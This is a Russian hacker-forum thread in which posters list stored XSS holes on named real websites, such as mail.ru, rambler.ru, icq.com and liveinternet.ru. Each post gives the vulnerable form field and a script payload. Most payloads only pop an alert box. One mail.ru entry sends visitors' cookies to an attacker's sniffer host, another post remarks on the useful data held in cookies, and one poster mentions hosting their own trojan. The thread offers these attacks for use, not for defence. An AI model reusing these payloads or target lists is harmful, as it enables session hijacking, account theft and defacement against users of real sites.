![]() |
Активные Xss
Тут постим тока активные XSS.
Так же сайт на котором вы нашли xss должен быть более или менее популярным: 1. Он не должен быть расположен на бесплатном хостинге. 2. Так же тиц и pr сайтов должны быть соотвественно не ниже 100 и 3. Сайтов удовлетворяющих этому требованию хоть отбавляй, а вот постить и искать xss на совсем не известных не интресно и не имеет смысла вообще. Желательно (но не обязательно), что бы сайты были на it тематику, или к примеру более менее известные треккеры, порталы. |
Сайт с хак-софтом, там и мой трой лежит))
samouchka.net - когда коммент добавляешь впиши. <img src=http://samouchka.net/engine/data/emoticons/sad.gif onload=XSS] |
www.jjurnal.ru
Довольно популярный жж. Постим сообщение от анонимного пользователя. Уязвимо поле "Имя:" "><script>alert()</script> Работает в опере и ие. |
email.ru
может и было..ибо XSS самая тупая)) .. отправляем письмо ..естестн в html.... Код:
<script>alert()</script>Код:
<img src=javascript:alert()> |
serials.softkiller.net
В теме любого кряка пишем камент с хсс Код:
"><script>alert('xss')</script> |
proplay.ru
proplay.ru
Идём в раздел "Команды": --http://www.proplay.ru/team/ Там создаём новую команду. Уязвимыми являются поля: -Игры -IRC канал -Домашняя страница Test: --http://www.proplay.ru/team/744/ |
sysadmin.mail.ru
Заходи на sysadmin.mail.ru..... Сморим *Сервисы Сисадмина* там лезим в *Моя регистрационная анкета* в поле Крупный город: Выбираем любой город)) далее в поле Свой город/район: строчим Код:
"><script>img = new Image(); img.src = "http://сайт.ru/сниффер.gif?"+document.cookie;</script>после переходим в Whois ..находим наш город...если в списке ников есть наш ник.....значит куки уже на снифе))ибо ненадо даже давать ссылку на свой профиль...просто на город где ваш логин)) :) |
www.qiq.ru
После регистрации, в профиле изменяем уязвимые поля, а именно: 1)Место жительства 2)О себе А этих местах пишем Код:
"><script>alert(/xss/)</script> |
ДОМ 3 ХЭК =))))))
dom3mir.ru Регистрируемся с любыми данными...... Далее идем изменять свою анкету... В уязвимые поля: Район, Метро,Город пишем такой код..ну там уж как придумаете Код:
Москва" onmouseover="alert('xss')" |
http://www.ohizba.ru/index.php?type=page&id=13
уязвимы все поля в гостевой книге фуфло, но баг.. //updat3: Код:
http://www.autolider.info/news/main.php?id=108&cpage=1извините, редактирование не пашет.. если я что-то нарушил, соедините плз посты :) запахало) |
splashblog.com
Блоггер фоток. Заливаем новую фотку. Уязвимо поле "Caption:" Код:
"><script>alert();</script> |
http://rock-rus.com.ru/users.php
в регистрации пишем мыло Код:
blblbl@hek.cc"><script>alert('alert')</script> |
icq.com
Заходим на форумы или в группы, создаем голосование. Уязвимы поля "Answer..." Код:
<script>alert(1);</script>Работает в ие и опере. |
meta.ua
Идем в блог, создаем комментарий Код:
<script>alert(10);</script>Работает в ие и опере. |
comby.ru
Везде где можно оставить комментарий: Код:
<img src=javascript:alert()>Работает в ие и опере. |
http://planeta.solo.by/- геймерский сайт провайдера.
В личку написать: <img src=fuck onerror=alert(\'xss\') |
tForum <= b0.915
Форум малораспространённый, но всё же. Активная XSS в поле "Message". Код:
http://www.target/path/message.phpКод:
[img]javascript:alert(document.cookie)[/img] |
Отморозки
http://www.otmorozki.org/images/login_d.gif ============= Otmorozki.org ============= Заходим в любую новость пишем комментарий... Уязвимое поле "тема" ..вот там и пишем наш кодик.. Код:
"><script>alert("Отморозки вас похекале")</script> |
жесть,зачод
|
Warcraft
http://games.mipt.ru/wc3/images/miptlogo.png ============= Games.mipt.ru/wc3/ ============= Уязвимые поля при регистрации: "Полное имя" "О пользователе" "Дом.страница" Вставляем туда код Код:
"><script>alert("Mipt \nВас похекале....\nУязвимость на вашем сайте нашел я, Isis \nРеспект всему античату \nА также отдельный респект:\n gemaglabin\n Great\n blackybr\n ettee\n and etc..... Гыгы \n Короче вас похекале :))) ")</script>Isis |
buka.ru
в камментах к новостям ' любезно заменяются на " |
warlog.info
Заходим в настройки сайта. Уязвимо поле "Название" Код:
<script>alert();</script> |
Downloads.ru
http://downloads.ru/pics/www.gif Выбираем любой файл....пишем к нему комментарий... Все поля уязвимые т.е. мыло, ник и сообщение ... Код:
"><script>alert("xss")</script> |
ukrtelecom.ua
http://lib.kost.dn.ukrtelecom.ua/guestbook.php |
liveinternet.ru
В дневниках. 1) Пишем личное сообщение. Уязвимо поле "Заголовок:" Код:
"><script>alert();</script>2) Добавляем новость в дневник. Уязвимо поле "Добавление новости:" Код:
"><script>alert();</script> |
|
zip-2002,
Код:
http://www.zip-2002.ru/forum/new.php?t=1&cat=3 |
Сайт: http://aktiv.kak-ya.ru/
Путь: http://aktiv.kak-ya.ru/by/ole4ka/2006/04/26/3434/comments Уязвимое поле: Заголовок Код:
Путь: http://forum.allsoch.ru/showthread.php3?s=11&threadid=17076 Уязвимое поле: Ваш ответ. Код:
|
http://www.booka.ru/
Вставить в поле Поиск Код:
"><script>alert()</script>Вставить в поле Ваш комментарий Код:
"><script>alert()</script>http://catalog.designatelie.ru Вставить в поле Поиска Код:
"><script>alert()</script> |
Цитата:
Сайт: http://www.photo-cult.com/ Путь: http://www.photo-cult.com/showpic.php?rate&id=187916 Уязвимое поле: Коментар Код:
"><script>alert()</script> |
http://www.bilandima.ru бррр..противно...
Дневники>Новая Запись> Адрес фотографии > Код:
http://"><script>alert(/xss/)</script> |
rambler.ru
В «Планете» -> «Профиль» -> «Контакты» Уязвимо поле “ICQ 2” и название аватарки. Куки не стыришь, тк ограничение стоит 22 символа((( Код:
<img src=javascript:alert()> |
http://kemclub.ru/
При регистрации (http://kemclub.ru/reg.php), уязвимо поле Ф.И.О - Код:
<script>alert()</script>потом заходим Код:
http://kemclub.ru/club.php?p=8&srat=1 |
http://ismart.ee/
Интернет магазин по продаже книг. Искал где купить "Красный Лондон", нашел XSS : ) При регистарации ( Код:
http://ismart.ee/Books.dll/login?next=indexуязвимы поля: 1. E-mail; - вписываем Код:
qwe@qwe.ru"><script>alert(/xss/)</script>Код:
<script>alert(/xss/)</script>Код:
<script>alert(/xss/)</script>Все заказы просматриваются вручную кстати ;) И напоследок пассивная XSS, хотя это и не так интересно : Код:
http://ismart.ee/Books.dll/find?fulltextfind=1&fastfind=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E |
Xss на сайте ЦСКА
Сайт http://www.cskabasket.com/
Постим коммент Код:
<script>alert ();</script> |
http://www.yandex.ru/cgi-bin/test-robots?host=morpheg.narod.ru
Хек или не хек? |
forum.xakep.ru
Запостил сюда тк не понял какой у них тип форума. На форуме прицепляем файл тхт с содержанием: "><script>alert()</script> и открываем его в опере, именно в опере не через блокнот!!! но млин касяк в том что у меня срабатывает через раз))) В куках много полезной информации. на ие не тестил, он у меня глючит). |
на ачате слева ссылка $$$ для web-мастеров
http://tak.ru/editing.php в любом поле нет фильтрации : "><script>alert()</script> |
http://dyn.gismeteo.ru/cgi-bin/showmap.exe?base=commonmaps&file=BALTIC.GIF&lang=r us&title=%3Cscript%3Ealert('Here%20was%202pick');% 3C/script%3E
|
Цитата:
|
| Время: 23:13 |